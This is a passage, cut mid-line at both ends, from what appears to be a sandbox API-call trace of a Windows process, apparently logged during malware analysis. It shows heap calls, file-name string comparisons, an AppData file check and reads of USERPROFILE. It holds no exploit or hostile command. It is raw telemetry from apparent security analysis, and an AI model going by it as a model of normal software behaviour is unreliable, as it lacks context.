HALPmcxz/AppData/Roaming/dunBms1jB_.jpg", nBufferLength=0x104, lpBuffer=0x8bf664, lpFilePart=0x8bf658 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\dunBms1jB_.jpg", lpFilePart=0x8bf658*="dunBms1jB_.jpg") returned 0x3c [0196.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24f1fe0 | out: hHeap=0x25c0000) returned 1 [0196.929] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\dunBms1jB_.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\dunbms1jb_.jpg")) returned 0xffffffff [0196.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0196.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0196.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0196.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0196.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0196.929] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0196.930] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0196.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d760 | out: hHeap=0x25c0000) returned 1 [0196.930] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0196.930] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0196.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0196.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0196.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0196.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0196.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0196.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0196.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0196.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0196.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0196.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0196.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0196.930] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0196.930] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0196.930] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e-h1xk7cgYR.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0196.930] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-h1xk7cgYR.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0196.930] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h1xk7cgYR.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0196.931] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1xk7cgYR.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0196.931] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xk7cgYR.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0196.931] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k7cgYR.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0196.931] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7cgYR.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0196.931] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cgYR.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0196.931] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gYR.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0196.931] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YR.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0196.931] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="R.swf", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0196.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0196.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0196.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0196.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0196.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0196.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0196.931] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0196.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d760 [0196.931] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0196.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0196.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0196.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0196.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0196.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1888 [0196.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1888 | out: hHeap=0x25c0000) returned 1 [0196.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0196.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0196.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0196.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0196.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0196.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0196.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0196.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0196.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0196.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0196.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0196.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0196.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b4870 [0196.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1888 [0196.932] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="e-h1xk7cgYR.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0196.932] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="-h1xk7cgYR.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0196.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="h1xk7cgYR.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0196.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="1xk7cgYR.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0196.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xk7cgYR.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0196.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="k7cgYR.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0196.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7cgYR.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0196.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="cgYR.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0196.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="gYR.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0196.933] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="YR.swf", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0196.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0196.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0196.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0196.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b98 | out: hHeap=0x25c0000) returned 1 [0196.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0196.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0196.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0196.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0196.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0196.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0196.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9b88 | out: hHeap=0x25c0000) returned 1 [0196.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f90 | out: hHeap=0x25c0000) returned 1 [0196.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0196.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0196.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0196.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9390 | out: hHeap=0x25c0000) returned 1 [0196.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9390 [0196.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0196.934] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0196.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0196.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1948 [0196.934] CharUpperBuffW (in: lpsz="A0F00600E09", cchLength=0xb | out: lpsz="A0F00600E09") returned 0xb [0196.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6b20 | out: hHeap=0x25c0000) returned 1 [0196.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1948 | out: hHeap=0x25c0000) returned 1 [0196.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa140 [0196.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1948 [0196.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f90 [0196.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9b88 [0196.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16e8 [0196.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0196.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0196.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0196.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0196.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0196.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x249c7b0 [0196.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1908 [0196.935] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0196.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0196.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0196.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d38 [0196.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0196.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0196.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa200 [0196.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0196.935] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0196.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c18 [0196.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0196.935] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18d8 [0196.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0196.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249c7b0 | out: hHeap=0x25c0000) returned 1 [0196.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0196.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0196.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0196.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0196.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0196.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0196.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0196.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0196.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0196.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0196.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0196.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc0) returned 0x249c7b0 [0196.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0196.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0196.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0196.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0196.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0196.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa068 | out: hHeap=0x25c0000) returned 1 [0196.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0196.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0196.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16e8 | out: hHeap=0x25c0000) returned 1 [0196.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b16e8 [0196.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa068 [0196.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1908 [0196.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0196.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0196.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0196.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0196.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0196.936] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xca) returned 0x24b3020 [0196.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0196.937] CharUpperBuffW (in: lpsz="UserProfileDir", cchLength=0xe | out: lpsz="USERPROFILEDIR") returned 0xe [0196.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0196.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d38 [0196.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9ff0 [0196.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0196.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0196.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24aa200 [0196.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0196.937] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8bf3b0, nSize=0x104 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1d [0196.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9fa8 [0196.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0196.937] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ba8 [0196.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0196.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3020 | out: hHeap=0x25c0000) returned 1 [0196.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0196.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0196.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ff0 | out: hHeap=0x25c0000) returned 1 [0196.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0196.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9d38 | out: hHeap=0x25c0000) returned 1 [0196.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0196.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ac9f0 | out: hHeap=0x25c0000) returned 1 [0196.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0196.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0196.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0196.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0196.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xd0) returned 0x24b3020 [0196.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d030 | out: hHeap=0x25c0000) returned 1 [0196.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0196.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0196.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0196.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0196.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0196.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0196.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b1908 [0196.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0196.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0196.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0196.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0196.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18e8 [0196.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0196.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1848 [0196.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1848 | out: hHeap=0x25c0000) returned 1 [0196.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9d38 [0196.938] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0196.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0196.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0196.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa200 | out: hHeap=0x25c0000) returned 1 [0196.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b98 [0196.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa200 [0196.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ff0 [0196.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3a88 [0196.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0196.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b10b8 [0196.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0196.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c40 [0196.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0196.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9c48 [0196.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b78 [0196.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0196.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b17c8 [0196.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9708 | out: hHeap=0x25c0000) returned 1 [0196.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6ad0 [0196.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0196.939] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f18 [0196.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0196.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0196.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1898 [0196.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0f8 | out: hHeap=0x25c0000) returned 1 [0196.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0196.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa0f8 [0196.940] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d030 [0196.940] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, 